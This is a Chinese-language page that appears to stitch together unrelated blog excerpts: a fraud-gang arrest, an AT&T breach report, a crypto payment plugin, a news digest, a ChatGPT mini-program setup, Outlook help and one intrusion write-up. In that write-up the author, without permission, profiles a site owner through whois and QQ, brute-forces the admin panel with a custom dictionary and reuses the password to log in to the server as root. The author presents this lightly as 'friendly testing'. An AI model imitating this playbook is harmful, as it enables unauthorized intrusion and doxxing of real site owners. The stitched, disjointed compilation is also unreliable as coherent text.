山东泰安宁阳县公安局根据李女士提供的信息，立即组织精干力量成立专案组。经过深入研判、分析，一个买卖银行卡、帮助诈骗分子洗钱的犯罪团伙浮出水面。该团伙以网络兼职为由，收购身份证、银行卡、手机卡等，再将两卡打包出售。同时，该团伙还以高额返利为诱惑，吸引“求职者”介绍同伴加入，网罗更多团伙成员。为了将该团伙一网打尽，2023年2月，专案组展开收网行动。民警兵分8路，远赴福建、湖南、河南、四川等省市进行抓捕。目前，该团伙15名犯罪嫌疑人全部被抓获，案件正在进一步审理中。 温馨提示 1线上兼职要谨慎。网络世界繁杂，寻找兼职要练就“火眼金睛”，反复核实其真实性、合法性，远离诈骗陷阱。 2.莫贪小利，守好“两卡”。不出租、出借、出售个人银行卡、手机卡、身份证和网银U盾等账户存取工具，以免因为贪图小利小惠而造成更大的经济损失、承担法律责任。 3.积极举报，及时报警。一旦发现买卖银行卡和身份证的犯罪行为，应及时向公安机关举报，配合公安机关或发卡银行做好调查取证工作，有效打击犯罪分子，自觉维护良好的用卡秩序，保障自己的合法利益。   莫贪图小利 莫想赚“快钱” 莫轻信他人 莫成为犯罪分子的“工具人” 千万保护好自己的人生 美国电信巨头AT&T确认遭数据泄露 殃及900万客户账户 2023年3月12日，据报道，美国电信巨头AT&T近日向客户通报了一起数据泄露事件，导致攻击者能够获取与客户“设备升级资格”相关的信息。这起严重的安全漏洞影响了大约900万个客户账户，发生在2023年1月，这也是T-Mobile遭受大规模数据泄露的同一个月，T-Mobile的数据泄露影响了大约3700万个后付费和预付费账户。 AT&T 的一位代表在接受采访时表示：此次事件泄露了客户专有网络信息(CPNI)，包括账户上线路数量或无线套餐等数据。此外，个人身份信息如名字、无线账号、无线电话号码和电子邮件地址也被暴露。在某些情况下，黑客还获取了客户其它信息，如每月支付金额、过期金额、套餐名称以及每月收费和 / 或使用分钟数。 据AT&T公司发言人称，已经根据联邦通信委员会的规定，将未经授权访问 CPNI 的情况通知了联邦执法部门。好在是，这次数据泄露事件没有涉及信用卡信息、社会安全号或账户密码，AT&T 自己的系统也没有被入侵。AT&T还确认已经修复了漏洞，这是AT&T很长时间以来首次面临这样的事。 ...

首先介绍一下这个插件： 一款适用于彩虹易支付的 USDT（TRC20）收款插件，收到的货币直接到自己钱包，不经过任何第三方。 测试的截图在下面，感兴趣的可以用一下 可以商用，但不能过度 源码无任何后门 顶部会显示自己平台的网址 ...

3月14日，农历二月二十三，星期二 在这里，每天60秒读懂世界！ 1、国家卫健委：正组织就开放单身女性冻卵征求专家意见。超6成被访者希望冻卵保存生育能力； 2、国家医保局：不得随意限制民营医院纳入医保定点。符合要求的"互联网+"医疗服务可纳入医保支付； 3、教育部：构建四级联动督导工作机制，持续推进"双减"落实落细； 4、杭州就户籍制度改革征求意见：大专可落户、县域落户全面放开； 5、《瞬息全宇宙》横扫奥斯卡七项大奖，杨紫琼成奥斯卡首位华裔影后； 6、中国驻多国使馆通知：3月15日起，以抗原检测替代核酸检测； 7、中国移动市值突破2.1万亿元，逼近"股王"贵州茅台，今年以来，中国移动累计涨幅达到45.32%，而同期贵州茅台仅上涨2%左右； 8、外媒：一艘载有47人的船只11日晚在马达加斯加西北部海域沉没，已致21人死亡，另有2人失踪； 9、继硅谷银行宣布破产后，美国监管机构又在当地12日以"系统性风险"为由关闭了签名银行。拜登：将确保两家关闭银行的储户可以获得所有存款；美国财长：硅谷银行破产主因在于美联储加息；美国多家银行股暴跌，第一共和银行暴跌近78%，盘中多次触发熔断； 10、汇丰：以1英镑收购硅谷银行英国子公司(SVB UK)，交易立即完成。预计SVB UK的有形资产约为14亿英镑； 11、外媒：尼加拉瓜总统下令关闭梵蒂冈大使馆，两国外交关系"中止"，原因与教皇方济各发表的涉及尼加拉瓜的言论有关；突尼斯总统：计划与叙利亚复交并互派大使； 12、土耳其将于3月18日起进入选举期，5月14日举行总统和议会选举； 13、韩国被强征劳工受害者拒绝接受政府提出的第三方代赔方案。韩媒：强征劳工赔偿方案遭批，尹锡悦支持率跌破40%大关； 14、韩美13日正式启动"自由护盾"大规模联演，持续进行11天，创史上最长演习纪录，民间团体集会抗议；朝中社：朝鲜12日进行战略巡航导弹潜射训练，发射了两枚； 15、俄瓦格纳集团创始人：俄军在巴赫穆特的战况非常困难，乌方投入了不计其数的预备队！乌方：反攻已指日可待； 【微语】你做得再好，也还是有人指指点点；你即便一塌糊涂，也还是有人唱赞歌。所以不必掉进他人的眼神，你需要讨好的，仅仅是你自己。...

首发ChatGPT3.5小程序开源vue！这一版本ui比较好看  回复速度也快了 小程序是java的 带后台 本来准备给你们带上接口的然后么后台是和接口连接的 我改什么内容你们前段都会显示所以 开源自己搭建下吧，腾讯云买个国外服务器就可以了 几十块钱！  而且最近openkey 封号比较频繁所以大家自己弄下！ *小程序需配合java程序，上面的链接为Java开源程序的搭建以及教程 *下面将详细介绍此套系统的前端搭建过程谢谢！ 所需环境 uniapp nodejs 搭建教学 首先前端源码下载下来，用idea源码编辑器打开,只需要修改配置文件中的请求api（request/request.js）,需要搭建好后端请求 1.服务器配置 centos7.9 2.宝塔面板安装宝塔 3.如果在线下载地址报错: 下载xshell 4.前端使用工具 : HBuilder X node.js 伪静态 try_files $uri $uri/ /index.html; location /prod-api/ { proxy_set_header Host $http_host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header REMOTE-HOST $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_pass http://120.48.124.77:7697/; }...

0x01 前言 今天闲来无事，在网上冲浪看帖，看到有个人发了一个D.S网站链接，出于好奇就点进去看了下，一看，好家伙，业务还挺多啊。可惜都要钱，咱可没钱！ 0x02 尝试爆破 然后便想看看有没有办法白嫖，哦不，是想热心的帮忙友情检测一下。其实这种D.S系统之前也有了解过，总的来说，安全性还是比较高的，基本没什么漏洞，所以就没想着去尝试系统中的漏洞。而是首先想到找一找后台地址，尝试一下弱口令，看能否进入后台，网站管理员使用了过于简单的弱口令，这种事情很常见，毕竟，人 是系统安全中最薄弱的环节。进入登录页面 尝试了常见的弱口令，不出我所料都失败了，看来要收集一下信息，生成字典然后进行爆破。   0x03 信息收集 首先查询了一下网站的 whois 信息，运气挺好，直接查到了名字 林* 和 qq 邮箱，其中 qq 邮箱账号和网站首页所留的 qq 号是一致的，都是 158xxxxxx。 又用这个 qq 号尝试添加好友搜了一下，得到了对方的出生月日和年龄，虽然不一定正确，但是先记录一下，没有去加好友，这样容易暴露。   0x04 再次爆破 用收集到的信息去生成字典，然后使用 burp 开始爆破。 喝瓶肥宅水慢慢等。。。 运气还挺好，爆破出来了！   0x05 登录后台 用账号密码登录后台，成功登录。   看到余额我惊了，这。。。这么有钱的吗？   当时立马就想给自己冲个永久会员了。 想了想还是忍住了，毕竟咱是友情检测。   0x06 爆破root 到这里已经拿下了网站的权限了，但我并不满足，我的目标可是拿 shell 。使用 nmap 扫描发现 22 端口开放，直接尝试用户名 root ，密码使用刚刚爆破出的网站密码，成功登录服务器！ 0x07 问题反馈 最后还是加了一下网站管理员的 qq，和他说了一下，让他改了一下密码，作为报答他给我送了一年 qq 会员。   唉，我真的没想白嫖呀  ...

如何修改 Outlook 邮箱的密码 1、打开 Outlook 邮箱登录网址：https://outlook.live.com/owa/ 2、点击主页面右上方的【登录】按钮。 3、输入【Outlook】的账号，然后点击【下一步】。 4、输入【密码】，然后点击【登录】。 5、点击右上角的头像那里 6、点击【我的个人资料】。 7、找到【更改密码】，点击进入。 8、选择短信验证或通过绑定的邮箱进行验证。 9、输入【验证码】，然后点击【验证】。 10、输入【当前密码】和两次密码，最后保存即可成功修改密码。 完成这些步骤后，你的 Outlook 邮箱密码就被修改了。请确保新密码足够安全，建议使用字母、数字和符号的组合，并不要使用容易被猜测的个人信息作为密码。...

回答的内容只有几个字，或者是乱七八糟的中文 类似上图这种，只回答一个“的”字，请关闭浏览器的自动翻译功能即可恢复正常   An error occurred. If this issue persists please contact us through our help center at help.openai.com 发生错误，如果此问题仍然存在，请通过我们的帮助中心 help.openai.com 与我们联系 如果是在晚上高峰期，出现这个是服务器奔溃，晚点再试 如果一直提问都是这样，需要更换 IP，刷新、清理缓存能够解决这个问题   如何使用中文版？ 答：界面是英文版的，但是你问他中文，他就回答你中文。 甚至可以命令他以任何的语言回答你的问题   之前使用正常，今天上不去了 答：无非就是 IP 不行（梯子）、浏览器不行、其中的某一个问题，你需要通过控制变量的方法 逐个排除、多试几次 最常见就是换个 IP，就恢复了...

登录 Outlook 邮箱提示账号已锁定，出现这个是因为我们的账号是全新的，部分人可能开了代理登陆导致风控 这时只需要需要验证手机号即可解除风控，填写自己的号码验证即可。   还有部分人会出现：【 我们无法向此号码发送短信 】的情况，使用下面链接登录 Outlook 邮箱，即可正常。 1. 打开此链接【https://account.live.com/reputationcheck】 2. 输入邮箱账号密码，并确认 3. 点击【Next】 4. 号码选择【+86】，然后输入你的号码，发送验证即可。 其他： Q：如果还是无法发送怎么办？ A：切换成国外 ip，浏览器关闭重新打开，或开隐私窗口，即可正常。...